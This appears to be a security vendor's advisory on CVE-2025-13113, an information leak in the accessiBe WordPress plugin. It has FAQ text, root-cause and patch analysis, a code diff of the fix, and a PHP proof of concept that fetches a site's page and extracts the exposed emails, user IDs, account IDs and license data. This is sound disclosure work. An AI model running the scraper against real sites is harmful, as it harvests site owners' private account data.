What is CVE-2025-13113?

CVE-2025-13113 is a vulnerability in the Web Accessibility by accessiBe plugin for WordPress that allows unauthenticated sensitive information exposure. It occurs when the plugin logs sensitive configuration data to the browser console on public pages, making it accessible to any visitor.

Who is affected by CVE-2025-13113?

Any WordPress site using the accessiBe plugin version 2.11 or earlier is affected by this vulnerability. Site administrators can check their plugin version in the WordPress admin dashboard under the Plugins section.

How does the vulnerability work?

The vulnerability arises from the `accessibe_render_js_in_footer()` function, which outputs the entire plugin options array to the browser console without access controls. When the accessibility widget is disabled, this data is logged, allowing any site visitor to view sensitive information.

What types of sensitive information are exposed?

The exposed information includes email addresses, accessiBe user IDs, account IDs, and license information. This data can be used for reconnaissance or targeted attacks against the site owner.

What is the severity level of this vulnerability?

CVE-2025-13113 has a CVSS score of 5.3, indicating a medium severity level. This means that while the vulnerability does not allow for immediate system compromise, it can lead to significant information disclosure.

How can I fix CVE-2025-13113?

To fix this vulnerability, update the accessiBe plugin to version 2.12 or later, where the issue has been patched. Regularly check for updates to ensure that your plugins are secure.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the accessiBe plugin until a secure version can be installed. Additionally, monitor your site for any unauthorized access or unusual activity.

How can I verify if my site is vulnerable?

You can verify if your site is vulnerable by inspecting the browser console on a public page where the accessibility widget is disabled. Look for console.log statements that output sensitive information.

What is the proof of concept for this vulnerability?

The proof of concept shows how an attacker can extract sensitive data from a vulnerable site by simply accessing the page. It uses a script to fetch the page and searches for the console.log output that reveals the plugin options.

What are the potential consequences of this vulnerability?

Successful exploitation could lead to unauthorized access to sensitive information, which may facilitate social engineering attacks or license abuse. This can compromise the security of the site and its users.

How can I educate my team about this vulnerability?

Provide your team with detailed documentation on CVE-2025-13113, including its impact, how to identify it, and the steps to mitigate it. Regular security training sessions can also help raise awareness about vulnerabilities.

Where can I find more information about CVE-2025-13113?

More information about CVE-2025-13113 can be found on the official CVE database, security advisories from accessiBe, and various cybersecurity blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-13113: Web Accessibility by accessiBe <= 2.11 – Unauthenticated Sensitive Information Exposure (accessibe)

CVE ID CVE-2025-13113

Plugin accessibe

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 2.11

Patched Version 2.12

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13113:
This vulnerability is an unauthenticated sensitive information exposure in the Web Accessibility by accessiBe WordPress plugin. The flaw affects all plugin versions up to and including 2.11. It exposes the complete plugin configuration array to any site visitor via the browser console when the accessibility widget is disabled. The CVSS score of 5.3 reflects a medium severity information disclosure issue.

Root Cause:
The vulnerability exists in the `accessibe_render_js_in_footer()` function within the `class.accessibeforwp.php` file. This function outputs JavaScript to the browser console without proper access controls. Specifically, at line 205 in the diff, the function calls `wp_json_encode($accessibe_options)` and logs the entire plugin options array. This occurs when the widget is disabled, as determined by the conditional logic starting at line 201. The function lacks any user capability checks or debug mode verification before exposing sensitive data.

Exploitation:
Attackers can exploit this vulnerability by simply visiting any public page of a vulnerable WordPress site. No authentication or special requests are required. The sensitive data appears automatically in the browser’s developer console when the accessibility widget is disabled. Attackers can view the console output directly or use automated tools to scrape the exposed data from the page source. The exploitation requires no specific parameters or payloads, making it trivial to execute.

Patch Analysis:
The patch in version 2.12 modifies line 205 of the `class.accessibeforwp.php` file. The vulnerable code `echo “console.log(“.wp_json_encode($accessibe_options).”)”` is replaced with `echo “console.log(“.wp_json_encode(“acsb not injected”).”)”`. Instead of logging the complete options array, the patched version logs only the static string “acsb not injected”. This change eliminates the information exposure while preserving the debug notification functionality.

Impact:
Successful exploitation exposes the complete plugin configuration array, which contains multiple sensitive data points. According to Atomic Edge research, this includes email addresses, accessiBe user IDs, account IDs, and license information. Attackers can use this information for reconnaissance, social engineering attacks, or license abuse. The exposed data could facilitate targeted attacks against the site owner or the accessiBe service infrastructure.

Differential between vulnerable and patched code

Code Diff

--- a/accessibe/accessibe.php
+++ b/accessibe/accessibe.php
@@ -3,7 +3,7 @@
   * Plugin Name: Web Accessibility by accessiBe
   * Plugin URI: https://accessibe.com/
   * Description: accessiBe is the #1 fully automated web accessibility solution. Protect your website from lawsuits and increase your potential audience.
-  * Version: 2.11
+  * Version: 2.12
   * Author: accessiBe
   * Author URI: https://accessibe.com/
   * License: GPLv2 or later
--- a/accessibe/accessiebe.php
+++ b/accessibe/accessiebe.php
@@ -14,9 +14,9 @@
 use MixpanelMixpanel;

 // Hook into WordPress after it has loaded fully
-add_action('plugins_loaded', 'handle_plugin_upgrade');
+add_action('plugins_loaded', 'accessibe_handle_plugin_upgrade');

-function handle_plugin_upgrade() {
+function accessibe_handle_plugin_upgrade() {
     $old = 'accessiebe.php';
     $new = 'accessibe.php';

@@ -41,12 +41,12 @@
         // Update the active plugins option in the database.
         update_option('active_plugins', $active_plugins);

-        track_plugin_upgrade();
+        accessibe_track_plugin_upgrade();
     }
 }

-function track_plugin_upgrade() {
-    $uuid = generateUuidV4();
+function accessibe_track_plugin_upgrade() {
+    $uuid = accessibe_generateUuidV4();
     $current_user = wp_get_current_user();

     if (!$current_user || empty($current_user->ID)) {
@@ -59,7 +59,7 @@
         [
             '$device_id' => $uuid,
             'pluginVersion' => accessibe_get_plugin_version(),
-            'wordpressStoreName' => sanitizeDomain(wp_parse_url(site_url())['host']),
+            'wordpressStoreName' => accessibe_sanitizeDomain(wp_parse_url(site_url())['host']),
             'wordpressPluginVersionNumber' => accessibe_get_plugin_version(),
             'wordpressAccountUserID' => $current_user->ID,
             'wordpressUserEmail' => $current_user->user_email,
@@ -74,7 +74,7 @@
     update_option('accessibeforwp_options', json_encode($current_data));
 }

-function generateUuidV4() {
+function accessibe_generateUuidV4() {
     $data = random_bytes(16);

     // Set version to 4 and variant to 10xx
@@ -84,7 +84,7 @@
     return vsprintf('%s%s-%s-%s-%s-%s%s%s', str_split(bin2hex($data), 4));
 }

-function sanitizeDomain($domain) {
+function accessibe_sanitizeDomain($domain) {
     // Use regex to replace "www." only at the beginning
     return preg_replace("/^www./", "", strtolower($domain));
 }
--- a/accessibe/class.accessibeforwp.php
+++ b/accessibe/class.accessibeforwp.php
@@ -198,13 +198,13 @@
    */
     public static function accessibe_render_js_in_footer() {
         $accessibe_options = self::accessibe_get_options();
-        $current_domain = self::sanitizeDomain(wp_parse_url(site_url())['host']);
+        $current_domain = self::accessibe_sanitizeDomain(wp_parse_url(site_url())['host']);
         // $current_domain = '9cc3-2405-201-5c0f-d070-14fd-b303-b02-1999.ngrok-free.app';

         if ((!isset($accessibe_options['accessibe']) && (!isset($accessibe_options['script']) || !isset($accessibe_options['script'][$current_domain])))
             || (isset($accessibe_options['accessibe']) && 'enabled' != $accessibe_options['accessibe'] && (!isset($accessibe_options['script']) || !isset($accessibe_options['script'][$current_domain])))
             || (isset($accessibe_options["script"][$current_domain]) && $accessibe_options["script"][$current_domain]['widgetStatus'] != true)) {
-            echo "<script>console.log(".wp_json_encode($accessibe_options).")</script>";
+            echo "<script>console.log(".wp_json_encode("acsb not injected").")</script>";
         }

         if (isset($accessibe_options["script"][$current_domain]) && $accessibe_options["script"][$current_domain]['widgetStatus'] != true) {
@@ -330,13 +330,13 @@
             'userId' => absint($current_user->ID),
             'email' => $user_email,
             'fullName' => $display_name,
-            'storeId' => self::sanitizeDomain(wp_parse_url(site_url())['host']),
+            'storeId' => self::accessibe_sanitizeDomain(wp_parse_url(site_url())['host']),
             'wapperApp' => array(
               'name' => 'WordPress',
               'version' => self::accessibe_get_plugin_version() . ''
             ),
             'mixpanelProps' => array (
-                'wordpressStoreName' => self::sanitizeDomain(wp_parse_url(site_url())['host']),
+                'wordpressStoreName' => self::accessibe_sanitizeDomain(wp_parse_url(site_url())['host']),
                 'wordpressPluginVersionNumber' => self::accessibe_get_plugin_version() . '',
                 'wordpressAccountUserID' => absint($current_user->ID),
                 'wordpressUserEmail' => $user_email,
@@ -364,7 +364,7 @@

     public static function get_current_domain() {
         $current_domain = wp_parse_url(site_url())['host'];
-        return self::sanitizeDomain($current_domain);
+        return self::accessibe_sanitizeDomain($current_domain);
     }

     public static function accessibe_domain_list_ajax() {
@@ -634,10 +634,10 @@
         return $accessibe_text;
     } // accessibe_admin_footer_text

-    public static function sanitizeDomain($domain) {
+    public static function accessibe_sanitizeDomain($domain) {
         // Use regex to replace "www." only at the beginning
         return preg_replace("/^www./", "", strtolower($domain));
-    } // sanitizeDomain
+    } // accessibe_sanitizeDomain


   /**
@@ -711,7 +711,7 @@
       return $accessibe_options;
   }// accessibe_get_options

-  public static function generateUuidV4() {
+  public static function accessibe_generateUuidV4() {
     $data = random_bytes(16);

     // Set version to 4 and variant to 10xx
@@ -908,7 +908,7 @@
         }

         if(!isset($current_data['acsbUserId']) && !isset($current_data['mixpanelUUID'])) {
-            $uuid = self::generateUuidV4();
+            $uuid = self::accessibe_generateUuidV4();
             $current_data['mixpanelUUID'] = $uuid;
         }

@@ -917,10 +917,10 @@
         $mixpanelHandler = new MixpanelHandler();

         if(isset($current_data['acsbUserId'])) {
-            $mixpanelHandler->trackEvent('pluginUpgraded', ['userId' => $current_data['acsbUserId'], 'pluginVersion' => $latest_version, 'previousPluginVersion' => $previous_version, 'wordpressStoreName' => self::sanitizeDomain(wp_parse_url(site_url())['host']), 'wordpressPluginVersionNumber' => self::accessibe_get_plugin_version() . '', 'wordpressAccountUserID' => $current_user->ID, 'wordpressUserEmail' => $current_user->user_email, 'wordpressUsername' => $current_user->user_login ]);
+            $mixpanelHandler->trackEvent('pluginUpgraded', ['userId' => $current_data['acsbUserId'], 'pluginVersion' => $latest_version, 'previousPluginVersion' => $previous_version, 'wordpressStoreName' => self::accessibe_sanitizeDomain(wp_parse_url(site_url())['host']), 'wordpressPluginVersionNumber' => self::accessibe_get_plugin_version() . '', 'wordpressAccountUserID' => $current_user->ID, 'wordpressUserEmail' => $current_user->user_email, 'wordpressUsername' => $current_user->user_login ]);
         }
         else {
-            $mixpanelHandler->trackEvent('pluginUpgraded', ['$device_id' => $current_data['mixpanelUUID'], 'pluginVersion' => $latest_version, 'previousPluginVersion' => $previous_version, 'wordpressStoreName' => self::sanitizeDomain(wp_parse_url(site_url())['host']), 'wordpressPluginVersionNumber' => self::accessibe_get_plugin_version() . '', 'wordpressAccountUserID' => $current_user->ID, 'wordpressUserEmail' => $current_user->user_email, 'wordpressUsername' => $current_user->user_login ]);
+            $mixpanelHandler->trackEvent('pluginUpgraded', ['$device_id' => $current_data['mixpanelUUID'], 'pluginVersion' => $latest_version, 'previousPluginVersion' => $previous_version, 'wordpressStoreName' => self::accessibe_sanitizeDomain(wp_parse_url(site_url())['host']), 'wordpressPluginVersionNumber' => self::accessibe_get_plugin_version() . '', 'wordpressAccountUserID' => $current_user->ID, 'wordpressUserEmail' => $current_user->user_email, 'wordpressUsername' => $current_user->user_login ]);
         }
         update_option(ACCESSIBE_WP_OPTIONS_KEY, json_encode($current_data));
     }
@@ -949,10 +949,10 @@
         $current_data = json_decode(get_option(ACCESSIBE_WP_OPTIONS_KEY), true);
         $data_to_check = self::accessibe_get_options();
         if(empty($data_to_check)) {
-            $uuid = self::generateUuidV4();
+            $uuid = self::accessibe_generateUuidV4();
             $current_user = wp_get_current_user();
             $mixpanelHandler = new MixpanelHandler();
-            $mixpanelHandler->trackEvent('pluginInstalled', ['$device_id' => $uuid, 'wordpressStoreName' => self::sanitizeDomain(wp_parse_url(site_url())['host']), 'wordpressPluginVersionNumber' => self::accessibe_get_plugin_version() . '', 'wordpressAccountUserID' => $current_user->ID, 'wordpressUserEmail' => $current_user->user_email, 'wordpressUsername' => $current_user->user_login ]);
+            $mixpanelHandler->trackEvent('pluginInstalled', ['$device_id' => $uuid, 'wordpressStoreName' => self::accessibe_sanitizeDomain(wp_parse_url(site_url())['host']), 'wordpressPluginVersionNumber' => self::accessibe_get_plugin_version() . '', 'wordpressAccountUserID' => $current_user->ID, 'wordpressUserEmail' => $current_user->user_email, 'wordpressUsername' => $current_user->user_login ]);
             $current_data['mixpanelUUID'] = $uuid;
             $current_data['pluginVersion'] = self::accessibe_get_plugin_version() . '';
             update_option(ACCESSIBE_WP_OPTIONS_KEY, json_encode($current_data));
@@ -964,16 +964,16 @@
         $current_user = wp_get_current_user();

         if(!isset($current_data['acsbUserId']) && !isset($current_data['mixpanelUUID'])) {
-            $uuid = self::generateUuidV4();
+            $uuid = self::accessibe_generateUuidV4();
             $current_data['mixpanelUUID'] = $uuid;
         }

         $mixpanelHandler = new MixpanelHandler();
         if(isset($current_data['acsbUserId'])) {
-            $mixpanelHandler->trackEvent('pluginUninstalled', ['userId' => $current_data['acsbUserId'], 'wordpressStoreName' => self::sanitizeDomain(wp_parse_url(site_url())['host']), 'wordpressPluginVersionNumber' => self::accessibe_get_plugin_version() . '', 'wordpressAccountUserID' => $current_user->ID, 'wordpressUserEmail' => $current_user->user_email, 'wordpressUsername' => $current_user->user_login ]);
+            $mixpanelHandler->trackEvent('pluginUninstalled', ['userId' => $current_data['acsbUserId'], 'wordpressStoreName' => self::accessibe_sanitizeDomain(wp_parse_url(site_url())['host']), 'wordpressPluginVersionNumber' => self::accessibe_get_plugin_version() . '', 'wordpressAccountUserID' => $current_user->ID, 'wordpressUserEmail' => $current_user->user_email, 'wordpressUsername' => $current_user->user_login ]);
         }
         else {
-            $mixpanelHandler->trackEvent('pluginUninstalled', ['$device_id' => $current_data['mixpanelUUID'], 'wordpressStoreName' => self::sanitizeDomain(wp_parse_url(site_url())['host']), 'wordpressPluginVersionNumber' => self::accessibe_get_plugin_version() . '', 'wordpressAccountUserID' => $current_user->ID, 'wordpressUserEmail' => $current_user->user_email, 'wordpressUsername' => $current_user->user_login ]);
+            $mixpanelHandler->trackEvent('pluginUninstalled', ['$device_id' => $current_data['mixpanelUUID'], 'wordpressStoreName' => self::accessibe_sanitizeDomain(wp_parse_url(site_url())['host']), 'wordpressPluginVersionNumber' => self::accessibe_get_plugin_version() . '', 'wordpressAccountUserID' => $current_user->ID, 'wordpressUserEmail' => $current_user->user_email, 'wordpressUsername' => $current_user->user_login ]);
         }
         delete_option(ACCESSIBE_WP_OPTIONS_KEY);
         delete_option(ACCESSIBE_WP_POINTERS_KEY);

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13113 - Web Accessibility by accessiBe <= 2.11 - Unauthenticated Sensitive Information Exposure
<?php

$target_url = 'https://example.com'; // Change this to the target WordPress site URL

// This vulnerability requires no special requests - the data is exposed in page HTML
// The PoC demonstrates how to extract the exposed data from the page source

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200) {
    // Search for the console.log pattern in the HTML response
    if (preg_match('/<script>console.log((.+?))</script>/', $response, $matches)) {
        // The vulnerable version outputs the entire options array as JSON
        // The patched version outputs only the string "acsb not injected"
        $console_output = $matches[1];
        
        // Check if the output contains JSON structure (vulnerable)
        if (strpos($console_output, '{') === 0 || strpos($console_output, '[') === 0) {
            echo "[!] VULNERABLE: Sensitive data exposed in console.logn";
            echo "[+] Extracted data: " . $console_output . "n";
            
            // Attempt to decode and display structured data
            $decoded = json_decode($console_output, true);
            if ($decoded !== null) {
                echo "[+] Parsed configuration array keys: " . implode(', ', array_keys($decoded)) . "n";
                // Look for specific sensitive fields
                $sensitive_fields = ['email', 'userId', 'accountId', 'license', 'acsbUserId'];
                foreach ($sensitive_fields as $field) {
                    if (isset($decoded[$field])) {
                        echo "[+] Found $field: " . $decoded[$field] . "n";
                    }
                }
            }
        } else {
            echo "[+] NOT VULNERABLE: Console output does not contain JSON datan";
            echo "[+] Console output: " . $console_output . "n";
        }
    } else {
        echo "[+] No console.log output found in page sourcen";
        echo "[+] This could mean: (1) Plugin not installed, (2) Widget is enabled, or (3) Already patchedn";
    }
} else {
    echo "[!] Failed to retrieve page. HTTP Code: " . $http_code . "n";
}

?>

Frequently Asked Questions

What is CVE-2025-13113?
Description of the vulnerability
CVE-2025-13113 is a vulnerability in the Web Accessibility by accessiBe plugin for WordPress that allows unauthenticated sensitive information exposure. It occurs when the plugin logs sensitive configuration data to the browser console on public pages, making it accessible to any visitor.
Who is affected by CVE-2025-13113?
Identifying vulnerable users
Any WordPress site using the accessiBe plugin version 2.11 or earlier is affected by this vulnerability. Site administrators can check their plugin version in the WordPress admin dashboard under the Plugins section.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the `accessibe_render_js_in_footer()` function, which outputs the entire plugin options array to the browser console without access controls. When the accessibility widget is disabled, this data is logged, allowing any site visitor to view sensitive information.
What types of sensitive information are exposed?
Details of the data leak
The exposed information includes email addresses, accessiBe user IDs, account IDs, and license information. This data can be used for reconnaissance or targeted attacks against the site owner.
What is the severity level of this vulnerability?
Understanding the risk
CVE-2025-13113 has a CVSS score of 5.3, indicating a medium severity level. This means that while the vulnerability does not allow for immediate system compromise, it can lead to significant information disclosure.
How can I fix CVE-2025-13113?
Steps for remediation
To fix this vulnerability, update the accessiBe plugin to version 2.12 or later, where the issue has been patched. Regularly check for updates to ensure that your plugins are secure.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the accessiBe plugin until a secure version can be installed. Additionally, monitor your site for any unauthorized access or unusual activity.
How can I verify if my site is vulnerable?
Testing for exposure
You can verify if your site is vulnerable by inspecting the browser console on a public page where the accessibility widget is disabled. Look for console.log statements that output sensitive information.
What is the proof of concept for this vulnerability?
Understanding the demonstration
The proof of concept shows how an attacker can extract sensitive data from a vulnerable site by simply accessing the page. It uses a script to fetch the page and searches for the console.log output that reveals the plugin options.
What are the potential consequences of this vulnerability?
Impact of exploitation
Successful exploitation could lead to unauthorized access to sensitive information, which may facilitate social engineering attacks or license abuse. This can compromise the security of the site and its users.
How can I educate my team about this vulnerability?
Training and awareness
Provide your team with detailed documentation on CVE-2025-13113, including its impact, how to identify it, and the steps to mitigate it. Regular security training sessions can also help raise awareness about vulnerabilities.
Where can I find more information about CVE-2025-13113?
Resources for further reading
More information about CVE-2025-13113 can be found on the official CVE database, security advisories from accessiBe, and various cybersecurity blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations